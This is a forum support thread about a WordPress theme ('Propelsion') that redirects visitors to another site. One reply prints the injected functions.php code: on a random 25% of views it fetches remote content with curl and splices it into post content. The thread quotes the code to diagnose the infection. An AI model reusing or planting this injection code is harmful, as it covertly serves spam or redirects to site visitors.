Viewing 8 posts - 1 through 8 (of 8 total)
  • Author
  • #18867

    My themes always redirect to, let me know when you want to access, I deactivate the themes for safety or google will ban my domain forever


    Hi ProjectIndo,

    I would suggest contacting your hosting provider and letting them know what is going on. The issue is most likely that your server has been compromised one way or another and some malicious code has been injected somewhere.

    Your host should be able to do a security scan and assist you further.




    Hello, I was overseas dealing some business, came back to my warm home and checking out my wordpress, I have installed WordPress Security Scan, hope it will help. Thank you


    Let us know how it goes and definitely contact your hosting provider. They are absolutely the best equipped to deal with malicious code on a server. Even something like a wordpress security plugin can’t tell you if you have had your main cpanel account compromised or something like that.




    It’s not your HOST, it’s your THEME.

    In particular, a malicious line of code in functions.php

    This suggests to me that you’ve downloaded a stolen copy of the theme, or someone has given/sold you a stolen version.

    Look in the early section of your functions.php file and you’ll see something like this:

    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists(‘curl_init’)) { $url = “”; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo “$data”; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, “<“);if ($openPos !== false){$closePos = strrpos($txtPrePos, “>”);if ($openPos > $closePos || $closePos === false){$pos = strpos($content, “>”, $pos) + 1;}}$spos = strpos($content, ” “, $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . ” ” . $text . substr($content, $spos);}return $content;}

    Thew quickest fix is to spend $60 and BUY the theme!

    If you try and remove malicious code, you’ll no doubt NOT get it ALL out, and you’ll have problems down the line with you website’s functionality. It’s just not worth the time or hassle!



    Did you solve the issue?

    Best regards,



    Hi there!

    I purchased and installed this theme yesterday and some of my page links redirect to as well!



    Can you post a link to a page where the issue occurs please?

    Best regards,


Viewing 8 posts - 1 through 8 (of 8 total)

The topic ‘Recent download for Propelsion has a malicious malware’ is closed to new replies.